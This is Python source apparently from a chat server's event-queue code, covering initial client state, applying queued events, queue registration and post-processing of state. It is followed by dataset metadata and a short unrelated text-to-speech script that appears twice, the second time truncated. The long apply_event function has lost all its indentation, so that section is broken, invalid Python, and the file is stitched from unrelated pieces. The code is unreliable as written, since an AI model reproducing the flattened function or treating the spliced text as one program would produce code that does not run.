            client_gravatar=client_gravatar,
            user_avatar_url_field_optional=user_avatar_url_field_optional,
            include_custom_profile_fields=user_profile is not None,
        )
        state["cross_realm_bots"] = list(get_cross_realm_dicts())

        # For the user's own avatar URLs, we force client_gravatar=False
        # so the client always receives fully-computed URLs here.
        state["avatar_source"] = settings_user.avatar_source
        state["avatar_url_medium"] = avatar_url(
            settings_user,
            medium=True,
            client_gravatar=False,
        )
        state["avatar_url"] = avatar_url(
            settings_user,
            medium=False,
            client_gravatar=False,
        )
        state["can_create_private_streams"] = settings_user.can_create_private_streams()
        state["can_create_public_streams"] = settings_user.can_create_public_streams()
        # TODO/compatibility: Deprecated in favor of the more specific
        # can_create_* fields above; kept as the OR of the three.
        state["can_create_streams"] = (
            settings_user.can_create_private_streams()
            or settings_user.can_create_public_streams()
            or settings_user.can_create_web_public_streams()
        )
        state["can_create_web_public_streams"] = settings_user.can_create_web_public_streams()
        state["can_subscribe_other_users"] = settings_user.can_subscribe_other_users()
        state["can_invite_others_to_realm"] = settings_user.can_invite_others_to_realm()
        state["is_admin"] = settings_user.is_realm_admin
        state["is_owner"] = settings_user.is_realm_owner
        state["is_moderator"] = settings_user.is_moderator
        state["is_guest"] = settings_user.is_guest
        state["is_billing_admin"] = settings_user.is_billing_admin
        state["user_id"] = settings_user.id
        state["email"] = settings_user.email
        state["delivery_email"] = settings_user.delivery_email
        state["full_name"] = settings_user.full_name
    if want("realm_bot"):
        state["realm_bots"] = [] if user_profile is None else get_owned_bot_dicts(user_profile)
    # The number of embedded bots is small, so we send all of them.
    if want("realm_embedded_bots"):
        realm_embedded_bots = []
        for bot in EMBEDDED_BOTS:
            realm_embedded_bots.append(
                {"name": bot.name, "config": load_bot_config_template(bot.name)}
            )
        state["realm_embedded_bots"] = realm_embedded_bots
    # Metadata about the incoming-webhook integrations this server supports.
    if want("realm_incoming_webhook_bots"):
        realm_incoming_webhook_bots = []
        for integration in WEBHOOK_INTEGRATIONS:
            realm_incoming_webhook_bots.append(
                {
                    "name": integration.name,
                    "config": {c[1]: c[0] for c in integration.config_options},
                }
            )
        state["realm_incoming_webhook_bots"] = realm_incoming_webhook_bots
    if want("recent_private_conversations"):
        # A data structure containing records of this form:
        #
        #   [{'max_message_id': 700175, 'user_ids': [801]}]
        state["raw_recent_private_conversations"] = (
            {} if user_profile is None else get_recent_private_conversations(user_profile)
        )
    if want("subscription"):
        if user_profile is not None:
            sub_info = gather_subscriptions_helper(
                user_profile,
                include_subscribers=include_subscribers,
            )
        else:
            sub_info = get_web_public_subs(realm)
        state["subscriptions"] = sub_info.subscriptions
        state["unsubscribed"] = sub_info.unsubscribed
        state["never_subscribed"] = sub_info.never_subscribed
    if want("update_message_flags") and want("message"):
        # Keeping unread_msgs updated requires both message flag updates and
        # message updates. This is due to the fact that new messages will not
        # generate a flag update so we need to use the flags field in the
        # message event.
        if user_profile is not None:
            state["raw_unread_msgs"] = get_raw_unread_data(user_profile)
        else:
            # Spectators have no unread messages; build the empty structure.
            state["raw_unread_msgs"] = extract_unread_data_from_um_rows([], user_profile)
    if want("starred_messages"):
        state["starred_messages"] = (
            [] if user_profile is None else get_starred_message_ids(user_profile)
        )
    if want("stream"):
        if include_streams:
            # The web app doesn't use the data from here; instead,
            # it uses data from state["subscriptions"] and other
            # places.
            if user_profile is not None:
                state["streams"] = do_get_streams(
                    user_profile, include_all_active=user_profile.is_realm_admin
                )
            else:
                # TODO: This line isn't used by the web app because it
                # gets its stream data from subscriptions, above.
                state["streams"] = get_web_public_streams(realm)
    if want("default_streams"):
        if settings_user.is_guest:
            # Guest users and logged-out users don't have access to
            # all default streams, so we pretend the organization
            # doesn't have any.
            state["realm_default_streams"] = []
        else:
            state["realm_default_streams"] = streams_to_dicts_sorted(
                get_default_streams_for_realm(realm.id)
            )
    if want("default_stream_groups"):
        if settings_user.is_guest:
            state["realm_default_stream_groups"] = []
        else:
            state["realm_default_stream_groups"] = default_stream_groups_to_dicts_sorted(
                get_default_stream_groups(realm)
            )
    if want("stop_words"):
        state["stop_words"] = read_stop_words()
    # Legacy flat personal-settings fields; skipped when the client
    # opted into the nested "user_settings" object instead.
    if want("update_display_settings") and not user_settings_object:
        for prop in UserProfile.display_settings_legacy:
            state[prop] = getattr(settings_user, prop)
        state["emojiset_choices"] = UserProfile.emojiset_choices()
        state["timezone"] = settings_user.timezone
    if want("update_global_notifications") and not user_settings_object:
        for notification in UserProfile.notification_settings_legacy:
            state[notification] = getattr(settings_user, notification)
        state["available_notification_sounds"] = get_available_notification_sounds()
    if want("user_settings"):
        state["user_settings"] = {}
        for prop in UserProfile.property_types:
            state["user_settings"][prop] = getattr(settings_user, prop)
        state["user_settings"]["emojiset_choices"] = UserProfile.emojiset_choices()
        state["user_settings"]["timezone"] = settings_user.timezone
        state["user_settings"][
            "available_notification_sounds"
        ] = get_available_notification_sounds()
    if want("user_status"):
        # We require creating an account to access statuses.
        state["user_status"] = {} if user_profile is None else get_user_info_dict(realm_id=realm.id)
    if want("video_calls"):
        state["has_zoom_token"] = settings_user.zoom_token is not None
    if want("giphy"):
        # GIPHY API keys are effectively public (the client-side JS
        # requires the API key to work). This security model makes
        # sense because GIPHY API keys are all essentially equivalent
        # in letting one search for GIFs; GIPHY only requires API keys
        # to exist at all so that they can deactivate them in cases of
        # abuse.
        state["giphy_api_key"] = settings.GIPHY_API_KEY if settings.GIPHY_API_KEY else ""
    if user_profile is None:
        # To ensure we have the correct user state set for spectators.
        assert state["is_admin"] is False
        assert state["is_owner"] is False
        assert state["is_guest"] is True
    return state
def apply_events(
    user_profile: UserProfile,
    *,
    state: Dict[str, Any],
    events: Iterable[Dict[str, Any]],
    fetch_event_types: Optional[Collection[str]],
    client_gravatar: bool,
    slim_presence: bool,
    include_subscribers: bool,
) -> None:
    """Mutate `state` in place by applying each queued event in order.

    Raises RestartEventException on a `restart` event, since the caller
    must then rebuild state from scratch. Events whose type is not in
    `fetch_event_types` (when given) are skipped.
    """
    for event in events:
        event_type = event["type"]
        if event_type == "restart":
            raise RestartEventException()
        if fetch_event_types is not None and event_type not in fetch_event_types:
            # TODO: continuing here is not, most precisely, correct.
            # In theory, an event of one type, e.g. `realm_user`,
            # could modify state that doesn't come from that
            # event type alone.
            continue
        apply_event(
            user_profile,
            state=state,
            event=event,
            client_gravatar=client_gravatar,
            slim_presence=slim_presence,
            include_subscribers=include_subscribers,
        )
def apply_event(
user_profile: UserProfile,
*,
state: Dict[str, Any],
event: Dict[str, Any],
client_gravatar: bool,
slim_presence: bool,
include_subscribers: bool,
) -> None:
if event["type"] == "message":
state["max_message_id"] = max(state["max_message_id"], event["message"]["id"])
if "raw_unread_msgs" in state:
apply_unread_message_event(
user_profile,
state["raw_unread_msgs"],
event["message"],
event["flags"],
)
if event["message"]["type"] != "stream":
if "raw_recent_private_conversations" in state:
conversations = state["raw_recent_private_conversations"]
recipient_id = get_recent_conversations_recipient_id(
user_profile, event["message"]["recipient_id"], event["message"]["sender_id"]
)
if recipient_id not in conversations:
conversations[recipient_id] = dict(
user_ids=sorted(
user_dict["id"]
for user_dict in event["message"]["display_recipient"]
if user_dict["id"] != user_profile.id
),
)
conversations[recipient_id]["max_message_id"] = event["message"]["id"]
return
for sub_dict in state.get("subscriptions", []):
if event["message"]["stream_id"] == sub_dict["stream_id"]:
if sub_dict["first_message_id"] is None:
sub_dict["first_message_id"] = event["message"]["id"]
for stream_dict in state.get("streams", []):
if event["message"]["stream_id"] == stream_dict["stream_id"]:
if stream_dict["first_message_id"] is None:
stream_dict["first_message_id"] = event["message"]["id"]
elif event["type"] == "heartbeat":
pass
elif event["type"] == "drafts":
if event["op"] == "add":
state["drafts"].extend(event["drafts"])
else:
if event["op"] == "update":
event_draft_idx = event["draft"]["id"]
def _draft_update_action(i: int) -> None:
state["drafts"][i] = event["draft"]
elif event["op"] == "remove":
event_draft_idx = event["draft_id"]
def _draft_update_action(i: int) -> None:
del state["drafts"][i]
# We have to perform a linear search for the draft that
# was either edited or removed since we have a list
# ordered by the last edited timestamp and not id.
state_draft_idx = None
for idx, draft in enumerate(state["drafts"]):
if draft["id"] == event_draft_idx:
state_draft_idx = idx
break
assert state_draft_idx is not None
_draft_update_action(state_draft_idx)
elif event["type"] == "hotspots":
state["hotspots"] = event["hotspots"]
elif event["type"] == "custom_profile_fields":
state["custom_profile_fields"] = event["fields"]
custom_profile_field_ids = {field["id"] for field in state["custom_profile_fields"]}
if "raw_users" in state:
for user_dict in state["raw_users"].values():
if "profile_data" not in user_dict:
continue
profile_data = user_dict["profile_data"]
for (field_id, field_data) in list(profile_data.items()):
if int(field_id) not in custom_profile_field_ids:
del profile_data[field_id]
elif event["type"] == "realm_user":
person = event["person"]
person_user_id = person["user_id"]
if event["op"] == "add":
person = copy.deepcopy(person)
if client_gravatar:
if person["avatar_url"].startswith("https://secure.gravatar.com"):
person["avatar_url"] = None
person["is_active"] = True
if not person["is_bot"]:
person["profile_data"] = {}
state["raw_users"][person_user_id] = person
elif event["op"] == "remove":
state["raw_users"][person_user_id]["is_active"] = False
elif event["op"] == "update":
is_me = person_user_id == user_profile.id
if is_me:
if "avatar_url" in person and "avatar_url" in state:
state["avatar_source"] = person["avatar_source"]
state["avatar_url"] = person["avatar_url"]
state["avatar_url_medium"] = person["avatar_url_medium"]
if "role" in person:
state["is_admin"] = is_administrator_role(person["role"])
state["is_owner"] = person["role"] == UserProfile.ROLE_REALM_OWNER
state["is_moderator"] = person["role"] == UserProfile.ROLE_MODERATOR
state["is_guest"] = person["role"] == UserProfile.ROLE_GUEST
# Recompute properties based on is_admin/is_guest
state["can_create_private_streams"] = user_profile.can_create_private_streams()
state["can_create_public_streams"] = user_profile.can_create_public_streams()
state[
"can_create_web_public_streams"
] = user_profile.can_create_web_public_streams()
state["can_create_streams"] = (
state["can_create_private_streams"]
or state["can_create_public_streams"]
or state["can_create_web_public_streams"]
)
state["can_subscribe_other_users"] = user_profile.can_subscribe_other_users()
state["can_invite_others_to_realm"] = user_profile.can_invite_others_to_realm()
# TODO: Probably rather than writing the perfect
# live-update code for the case of racing with the
# current user changing roles, we should just do a
# full refetch.
if "never_subscribed" in state:
sub_info = gather_subscriptions_helper(
user_profile,
include_subscribers=include_subscribers,
)
state["subscriptions"] = sub_info.subscriptions
state["unsubscribed"] = sub_info.unsubscribed
state["never_subscribed"] = sub_info.never_subscribed
if "streams" in state:
state["streams"] = do_get_streams(
user_profile, include_all_active=user_profile.is_realm_admin
)
if state["is_guest"]:
state["realm_default_streams"] = []
else:
state["realm_default_streams"] = streams_to_dicts_sorted(
get_default_streams_for_realm(user_profile.realm_id)
)
for field in ["delivery_email", "email", "full_name", "is_billing_admin"]:
if field in person and field in state:
state[field] = person[field]
if "new_email" in person:
state["email"] = person["new_email"]
# In the unlikely event that the current user
# just changed to/from being an admin, we need
# to add/remove the data on all bots in the
# realm. This is ugly and probably better
# solved by removing the all-realm-bots data
# given to admin users from this flow.
if "role" in person and "realm_bots" in state:
prev_state = state["raw_users"][user_profile.id]
was_admin = prev_state["is_admin"]
now_admin = is_administrator_role(person["role"])
if was_admin and not now_admin:
state["realm_bots"] = []
if not was_admin and now_admin:
state["realm_bots"] = get_owned_bot_dicts(user_profile)
if client_gravatar and "avatar_url" in person:
# Respect the client_gravatar setting in the `users` data.
if person["avatar_url"].startswith("https://secure.gravatar.com"):
person["avatar_url"] = None
person["avatar_url_medium"] = None
if person_user_id in state["raw_users"]:
p = state["raw_users"][person_user_id]
for field in p:
if field in person:
p[field] = person[field]
if "role" in person:
p["is_admin"] = is_administrator_role(person["role"])
p["is_owner"] = person["role"] == UserProfile.ROLE_REALM_OWNER
p["is_guest"] = person["role"] == UserProfile.ROLE_GUEST
if "is_billing_admin" in person:
p["is_billing_admin"] = person["is_billing_admin"]
if "custom_profile_field" in person:
custom_field_id = person["custom_profile_field"]["id"]
custom_field_new_value = person["custom_profile_field"]["value"]
if "rendered_value" in person["custom_profile_field"]:
p["profile_data"][str(custom_field_id)] = {
"value": custom_field_new_value,
"rendered_value": person["custom_profile_field"]["rendered_value"],
}
else:
p["profile_data"][str(custom_field_id)] = {
"value": custom_field_new_value,
}
if "new_email" in person:
p["email"] = person["new_email"]
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "realm_bot":
if event["op"] == "add":
state["realm_bots"].append(event["bot"])
elif event["op"] == "remove":
user_id = event["bot"]["user_id"]
for bot in state["realm_bots"]:
if bot["user_id"] == user_id:
bot["is_active"] = False
elif event["op"] == "delete":
state["realm_bots"] = [
item for item in state["realm_bots"] if item["user_id"] != event["bot"]["user_id"]
]
elif event["op"] == "update":
for bot in state["realm_bots"]:
if bot["user_id"] == event["bot"]["user_id"]:
if "owner_id" in event["bot"]:
bot_owner_id = event["bot"]["owner_id"]
bot["owner_id"] = bot_owner_id
else:
bot.update(event["bot"])
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "stream":
if event["op"] == "create":
for stream in event["streams"]:
if not stream["invite_only"]:
stream_data = copy.deepcopy(stream)
if include_subscribers:
stream_data["subscribers"] = []
# We know the stream has no traffic, and this
# field is not present in the event.
#
# TODO: Probably this should just be added to the event.
stream_data["stream_weekly_traffic"] = None
# Add stream to never_subscribed (if not invite_only)
state["never_subscribed"].append(stream_data)
if "streams" in state:
state["streams"].append(stream)
if "streams" in state:
state["streams"].sort(key=lambda elt: elt["name"])
if event["op"] == "delete":
deleted_stream_ids = {stream["stream_id"] for stream in event["streams"]}
if "streams" in state:
state["streams"] = [
s for s in state["streams"] if s["stream_id"] not in deleted_stream_ids
]
state["never_subscribed"] = [
stream
for stream in state["never_subscribed"]
if stream["stream_id"] not in deleted_stream_ids
]
if event["op"] == "update":
# For legacy reasons, we call stream data 'subscriptions' in
# the state var here, for the benefit of the JS code.
for obj in state["subscriptions"]:
if obj["name"].lower() == event["name"].lower():
obj[event["property"]] = event["value"]
if event["property"] == "description":
obj["rendered_description"] = event["rendered_description"]
if event.get("history_public_to_subscribers") is not None:
obj["history_public_to_subscribers"] = event[
"history_public_to_subscribers"
]
if event.get("is_web_public") is not None:
obj["is_web_public"] = event["is_web_public"]
# Also update the pure streams data
if "streams" in state:
for stream in state["streams"]:
if stream["name"].lower() == event["name"].lower():
prop = event["property"]
if prop in stream:
stream[prop] = event["value"]
if prop == "description":
stream["rendered_description"] = event["rendered_description"]
if event.get("history_public_to_subscribers") is not None:
stream["history_public_to_subscribers"] = event[
"history_public_to_subscribers"
]
if event.get("is_web_public") is not None:
stream["is_web_public"] = event["is_web_public"]
elif event["type"] == "default_streams":
state["realm_default_streams"] = event["default_streams"]
elif event["type"] == "default_stream_groups":
state["realm_default_stream_groups"] = event["default_stream_groups"]
elif event["type"] == "realm":
if event["op"] == "update":
field = "realm_" + event["property"]
state[field] = event["value"]
if event["property"] == "plan_type":
# Then there are some extra fields that also need to be set.
state["zulip_plan_is_not_limited"] = event["value"] != Realm.PLAN_TYPE_LIMITED
state["realm_upload_quota_mib"] = event["extra_data"]["upload_quota"]
policy_permission_dict = {
"create_public_stream_policy": "can_create_public_streams",
"create_private_stream_policy": "can_create_private_streams",
"create_web_public_stream_policy": "can_create_web_public_streams",
"invite_to_stream_policy": "can_subscribe_other_users",
"invite_to_realm_policy": "can_invite_others_to_realm",
}
# Tricky interaction: Whether we can create streams and can subscribe other users
# can get changed here.
if field == "realm_waiting_period_threshold":
for policy, permission in policy_permission_dict.items():
if permission in state:
state[permission] = user_profile.has_permission(policy)
if event["property"] in policy_permission_dict.keys():
if policy_permission_dict[event["property"]] in state:
state[policy_permission_dict[event["property"]]] = user_profile.has_permission(
event["property"]
)
# Finally, we need to recompute this value from its inputs.
state["can_create_streams"] = (
state["can_create_private_streams"]
or state["can_create_public_streams"]
or state["can_create_web_public_streams"]
)
elif event["op"] == "update_dict":
for key, value in event["data"].items():
state["realm_" + key] = value
# It's a bit messy, but this is where we need to
if key == "authentication_methods":
state["realm_password_auth_enabled"] = value["Email"] or value["LDAP"]
state["realm_email_auth_enabled"] = value["Email"]
elif event["op"] == "deactivated":
# deactivation UI; if it'd been a moment sooner, we've
# have rendered the app and then immediately got this
# event (or actually, more likely, an auth error on GET
# /events) and immediately reloaded into the same
# deactivation UI. Passing achieves the same result.
pass
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "realm_user_settings_defaults":
if event["op"] == "update":
state["realm_user_settings_defaults"][event["property"]] = event["value"]
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "subscription":
if event["op"] == "add":
added_stream_ids = {sub["stream_id"] for sub in event["subscriptions"]}
was_added = lambda s: s["stream_id"] in added_stream_ids
existing_stream_ids = {sub["stream_id"] for sub in state["subscriptions"]}
# add the new subscriptions
for sub in event["subscriptions"]:
if sub["stream_id"] not in existing_stream_ids:
if "subscribers" in sub and not include_subscribers:
sub = copy.deepcopy(sub)
del sub["subscribers"]
state["subscriptions"].append(sub)
# remove them from unsubscribed if they had been there
state["unsubscribed"] = [s for s in state["unsubscribed"] if not was_added(s)]
# remove them from never_subscribed if they had been there
state["never_subscribed"] = [s for s in state["never_subscribed"] if not was_added(s)]
elif event["op"] == "remove":
removed_stream_ids = {sub["stream_id"] for sub in event["subscriptions"]}
was_removed = lambda s: s["stream_id"] in removed_stream_ids
# Find the subs we are affecting.
removed_subs = list(filter(was_removed, state["subscriptions"]))
# Remove our user from the subscribers of the removed subscriptions.
if include_subscribers:
for sub in removed_subs:
sub["subscribers"].remove(user_profile.id)
state["unsubscribed"] += removed_subs
# Now filter out the removed subscriptions from subscriptions.
state["subscriptions"] = [s for s in state["subscriptions"] if not was_removed(s)]
elif event["op"] == "update":
for sub in state["subscriptions"]:
if sub["stream_id"] == event["stream_id"]:
sub[event["property"]] = event["value"]
elif event["op"] == "peer_add":
if include_subscribers:
stream_ids = set(event["stream_ids"])
user_ids = set(event["user_ids"])
for sub_dict in [
state["subscriptions"],
state["unsubscribed"],
state["never_subscribed"],
]:
for sub in sub_dict:
if sub["stream_id"] in stream_ids:
subscribers = set(sub["subscribers"]) | user_ids
sub["subscribers"] = sorted(list(subscribers))
elif event["op"] == "peer_remove":
if include_subscribers:
stream_ids = set(event["stream_ids"])
user_ids = set(event["user_ids"])
for sub_dict in [
state["subscriptions"],
state["unsubscribed"],
state["never_subscribed"],
]:
for sub in sub_dict:
if sub["stream_id"] in stream_ids:
subscribers = set(sub["subscribers"]) - user_ids
sub["subscribers"] = sorted(list(subscribers))
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "presence":
if slim_presence:
user_key = str(event["user_id"])
else:
user_key = event["email"]
state["presences"][user_key] = get_presence_for_user(event["user_id"], slim_presence)[
user_key
]
elif event["type"] == "update_message":
# We don't return messages in /register, so we don't need to
# do anything for content updates, but we may need to update
# the unread_msgs data if the topic of an unread message changed.
if "new_stream_id" in event:
stream_dict = state["raw_unread_msgs"]["stream_dict"]
stream_id = event["new_stream_id"]
for message_id in event["message_ids"]:
if message_id in stream_dict:
stream_dict[message_id]["stream_id"] = stream_id
if TOPIC_NAME in event:
stream_dict = state["raw_unread_msgs"]["stream_dict"]
topic = event[TOPIC_NAME]
for message_id in event["message_ids"]:
if message_id in stream_dict:
stream_dict[message_id]["topic"] = topic
elif event["type"] == "delete_message":
if "message_id" in event:
message_ids = [event["message_id"]]
else:
message_ids = event["message_ids"] # nocoverage
max_message = (
Message.objects.filter(usermessage__user_profile=user_profile).order_by("-id").first()
)
if max_message:
state["max_message_id"] = max_message.id
else:
state["max_message_id"] = -1
if "raw_unread_msgs" in state:
for remove_id in message_ids:
remove_message_id_from_unread_mgs(state["raw_unread_msgs"], remove_id)
# The remainder of this block is about maintaining recent_private_conversations
if "raw_recent_private_conversations" not in state or event["message_type"] != "private":
return
# OK, we just deleted what had been the max_message_id for
# this recent conversation; we need to recompute that value
# from scratch. Definitely don't need to re-query everything,
state["raw_recent_private_conversations"] = get_recent_private_conversations(user_profile)
elif event["type"] == "reaction":
# The client will get the message with the reactions directly
pass
elif event["type"] == "submessage":
# The client will get submessages with their messages
pass
elif event["type"] == "typing":
# Typing notification events are transient and thus ignored
pass
elif event["type"] == "attachment":
# Attachment events are just for updating the "uploads" UI;
# they are not sent directly.
pass
elif event["type"] == "update_message_flags":
# We don't return messages in `/register`, so most flags we
if "raw_unread_msgs" in state and event["flag"] == "read" and event["op"] == "add":
for remove_id in event["messages"]:
remove_message_id_from_unread_mgs(state["raw_unread_msgs"], remove_id)
if event["flag"] == "starred" and "starred_messages" in state:
if event["op"] == "add":
state["starred_messages"] += event["messages"]
if event["op"] == "remove":
state["starred_messages"] = [
message
for message in state["starred_messages"]
if not (message in event["messages"])
]
elif event["type"] == "realm_domains":
if event["op"] == "add":
state["realm_domains"].append(event["realm_domain"])
elif event["op"] == "change":
for realm_domain in state["realm_domains"]:
if realm_domain["domain"] == event["realm_domain"]["domain"]:
realm_domain["allow_subdomains"] = event["realm_domain"]["allow_subdomains"]
elif event["op"] == "remove":
state["realm_domains"] = [
realm_domain
for realm_domain in state["realm_domains"]
if realm_domain["domain"] != event["domain"]
]
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "realm_emoji":
state["realm_emoji"] = event["realm_emoji"]
elif event["type"] == "realm_export":
pass
elif event["type"] == "alert_words":
state["alert_words"] = event["alert_words"]
elif event["type"] == "muted_topics":
state["muted_topics"] = event["muted_topics"]
elif event["type"] == "muted_users":
state["muted_users"] = event["muted_users"]
elif event["type"] == "realm_filters":
state["realm_filters"] = event["realm_filters"]
elif event["type"] == "realm_linkifiers":
state["realm_linkifiers"] = event["realm_linkifiers"]
elif event["type"] == "realm_playgrounds":
state["realm_playgrounds"] = event["realm_playgrounds"]
elif event["type"] == "update_display_settings":
if event["setting_name"] != "timezone":
assert event["setting_name"] in UserProfile.display_settings_legacy
state[event["setting_name"]] = event["setting"]
elif event["type"] == "update_global_notifications":
assert event["notification_name"] in UserProfile.notification_settings_legacy
state[event["notification_name"]] = event["setting"]
elif event["type"] == "user_settings":
# timezone setting is not included in property_types dict because
# this setting is not a part of UserBaseSettings class.
if event["property"] != "timezone":
assert event["property"] in UserProfile.property_types
if event["property"] in {
**UserProfile.display_settings_legacy,
**UserProfile.notification_settings_legacy,
}:
state[event["property"]] = event["value"]
state["user_settings"][event["property"]] = event["value"]
elif event["type"] == "invites_changed":
pass
elif event["type"] == "user_group":
if event["op"] == "add":
state["realm_user_groups"].append(event["group"])
state["realm_user_groups"].sort(key=lambda group: group["id"])
elif event["op"] == "update":
for user_group in state["realm_user_groups"]:
if user_group["id"] == event["group_id"]:
user_group.update(event["data"])
elif event["op"] == "add_members":
for user_group in state["realm_user_groups"]:
if user_group["id"] == event["group_id"]:
user_group["members"].extend(event["user_ids"])
user_group["members"].sort()
elif event["op"] == "remove_members":
for user_group in state["realm_user_groups"]:
if user_group["id"] == event["group_id"]:
members = set(user_group["members"])
user_group["members"] = list(members - set(event["user_ids"]))
user_group["members"].sort()
elif event["op"] == "remove":
state["realm_user_groups"] = [
ug for ug in state["realm_user_groups"] if ug["id"] != event["group_id"]
]
else:
raise AssertionError("Unexpected event type {type}/{op}".format(**event))
elif event["type"] == "user_status":
user_id_str = str(event["user_id"])
user_status = state["user_status"]
away = event.get("away")
status_text = event.get("status_text")
emoji_name = event.get("emoji_name")
emoji_code = event.get("emoji_code")
reaction_type = event.get("reaction_type")
if user_id_str not in user_status:
user_status[user_id_str] = {}
if away is not None:
if away:
user_status[user_id_str]["away"] = True
else:
user_status[user_id_str].pop("away", None)
if status_text is not None:
if status_text == "":
user_status[user_id_str].pop("status_text", None)
else:
user_status[user_id_str]["status_text"] = status_text
if emoji_name is not None:
if emoji_name == "":
user_status[user_id_str].pop("emoji_name", None)
else:
user_status[user_id_str]["emoji_name"] = emoji_name
if emoji_code is not None:
if emoji_code == "":
user_status[user_id_str].pop("emoji_code", None)
else:
user_status[user_id_str]["emoji_code"] = emoji_code
if reaction_type is not None:
if reaction_type == UserStatus.UNICODE_EMOJI and emoji_name == "":
user_status[user_id_str].pop("reaction_type", None)
else:
user_status[user_id_str]["reaction_type"] = reaction_type
if not user_status[user_id_str]:
user_status.pop(user_id_str, None)
state["user_status"] = user_status
elif event["type"] == "has_zoom_token":
state["has_zoom_token"] = event["value"]
else:
raise AssertionError("Unexpected event type {}".format(event["type"]))
def do_events_register(
    user_profile: UserProfile,
    user_client: Client,
    apply_markdown: bool = True,
    client_gravatar: bool = False,
    slim_presence: bool = False,
    event_types: Optional[Sequence[str]] = None,
    queue_lifespan_secs: int = 0,
    all_public_streams: bool = False,
    include_subscribers: bool = True,
    include_streams: bool = True,
    client_capabilities: Optional[Dict[str, bool]] = None,
    narrow: Optional[Collection[Sequence[str]]] = None,
    fetch_event_types: Optional[Collection[str]] = None,
) -> Dict[str, Any]:
    """Register an event queue and compute the initial state for a client.

    Allocates an event queue, fetches the initial application state, and
    applies any events that arrived while the state was being fetched, so
    the returned state is consistent with the returned ``last_event_id``.

    ``event_types`` controls which future events are delivered to the
    queue; ``fetch_event_types`` (when given) instead controls which state
    sections are fetched here.

    Returns the post-processed state dict, including ``last_event_id``
    (-1 when no events had arrived yet).

    Raises JsonableError if an event queue cannot be allocated.
    """
    # Use None (not {} / []) as the default for the mutable parameters so
    # a shared default container can never leak state between calls
    # (classic Python mutable-default pitfall); normalize here instead.
    if client_capabilities is None:
        client_capabilities = {}
    if narrow is None:
        narrow = []

    # Validate the narrow filters up front, before contacting Tornado.
    check_supported_events_narrow_filter(narrow)

    notification_settings_null = client_capabilities.get("notification_settings_null", False)
    bulk_message_deletion = client_capabilities.get("bulk_message_deletion", False)
    user_avatar_url_field_optional = client_capabilities.get(
        "user_avatar_url_field_optional", False
    )
    stream_typing_notifications = client_capabilities.get("stream_typing_notifications", False)
    user_settings_object = client_capabilities.get("user_settings_object", False)

    if user_profile.realm.email_address_visibility != Realm.EMAIL_ADDRESS_VISIBILITY_EVERYONE:
        # If real email addresses are not available to the user, their
        # clients cannot compute gravatars, so we force-set it to false.
        client_gravatar = False

    # fetch_event_types, when provided, takes precedence over event_types
    # for deciding which state sections to fetch below.
    if fetch_event_types is not None:
        event_types_set: Optional[Set[str]] = set(fetch_event_types)
    elif event_types is not None:
        event_types_set = set(event_types)
    else:
        event_types_set = None

    # Fill up the UserMessage rows if a soft-deactivated user has returned
    reactivate_user_if_soft_deactivated(user_profile)

    while True:
        # Note that we pass event_types, not fetch_event_types here, since
        # that's what controls which future events are sent.
        queue_id = request_event_queue(
            user_profile,
            user_client,
            apply_markdown,
            client_gravatar,
            slim_presence,
            queue_lifespan_secs,
            event_types,
            all_public_streams,
            narrow=narrow,
            bulk_message_deletion=bulk_message_deletion,
            stream_typing_notifications=stream_typing_notifications,
            user_settings_object=user_settings_object,
        )
        if queue_id is None:
            raise JsonableError(_("Could not allocate event queue"))

        ret = fetch_initial_state_data(
            user_profile,
            event_types=event_types_set,
            queue_id=queue_id,
            client_gravatar=client_gravatar,
            user_avatar_url_field_optional=user_avatar_url_field_optional,
            user_settings_object=user_settings_object,
            slim_presence=slim_presence,
            include_subscribers=include_subscribers,
            include_streams=include_streams,
        )

        # Apply events that came in while we were fetching initial data.
        events = get_user_events(user_profile, queue_id, -1)
        try:
            apply_events(
                user_profile,
                state=ret,
                events=events,
                fetch_event_types=fetch_event_types,
                client_gravatar=client_gravatar,
                slim_presence=slim_presence,
                include_subscribers=include_subscribers,
            )
        except RestartEventException:
            # A restart event means the fetched state may be stale;
            # retry with a fresh queue and freshly fetched state.
            continue
        else:
            break

    post_process_state(user_profile, ret, notification_settings_null)

    if len(events) > 0:
        ret["last_event_id"] = events[-1]["id"]
    else:
        ret["last_event_id"] = -1
    return ret
def post_process_state(
    user_profile: Optional[UserProfile], ret: Dict[str, Any], notification_settings_null: bool
) -> None:
    """Convert the raw_* staging keys of ``ret`` into their client-facing
    forms, in place, and apply stream-notification compatibility shims."""
    # Collapse the raw unread-message bookkeeping into the aggregate form.
    if "raw_unread_msgs" in ret:
        ret["unread_msgs"] = aggregate_unread_data(ret.pop("raw_unread_msgs"))

    # Split user records into active/non-active lists ordered by user_id,
    # dropping the internal is_active flag from each record.
    if "raw_users" in ret:
        records = sorted(ret.pop("raw_users").values(), key=lambda rec: rec["user_id"])
        active = []
        non_active = []
        for rec in records:
            (active if rec.pop("is_active") else non_active).append(rec)
        ret["realm_users"] = active
        ret["realm_non_active_users"] = non_active

    # Flatten recent PM conversations and order them newest-first.
    if "raw_recent_private_conversations" in ret:
        conversations = [
            dict(conv)
            for conv in ret.pop("raw_recent_private_conversations").values()
        ]
        conversations.sort(key=lambda conv: conv["max_message_id"], reverse=True)
        ret["recent_private_conversations"] = conversations

    if not notification_settings_null and "subscriptions" in ret:
        for sub in ret["subscriptions"] + ret["unsubscribed"]:
            handle_stream_notifications_compatibility(
                user_profile, sub, notification_settings_null
            )
| true | true |
f725f33a4ea17ac202a72b0756189315bf8f2eb2 | 191 | py | Python | text2speech.py | sumit169-hub/text-to-speech | 589dd36f95abf216676c0ac12a522f2deb70a4db | [
"BSL-1.0"
] | null | null | null | text2speech.py | sumit169-hub/text-to-speech | 589dd36f95abf216676c0ac12a522f2deb70a4db | [
"BSL-1.0"
] | null | null | null | text2speech.py | sumit169-hub/text-to-speech | 589dd36f95abf216676c0ac12a522f2deb70a4db | [
"BSL-1.0"
] | null | null | null | from gtts import gTTS
from playsound import playsound
audio="speech.mp3"
language='en'
sp=gTTS(text=input('ENTER YOUR TEXT: \n') ,lang=language, slow=False)
sp.save(audio)
playsound(audio)
| 21.222222 | 69 | 0.759162 | from gtts import gTTS
from playsound import playsound
audio="speech.mp3"
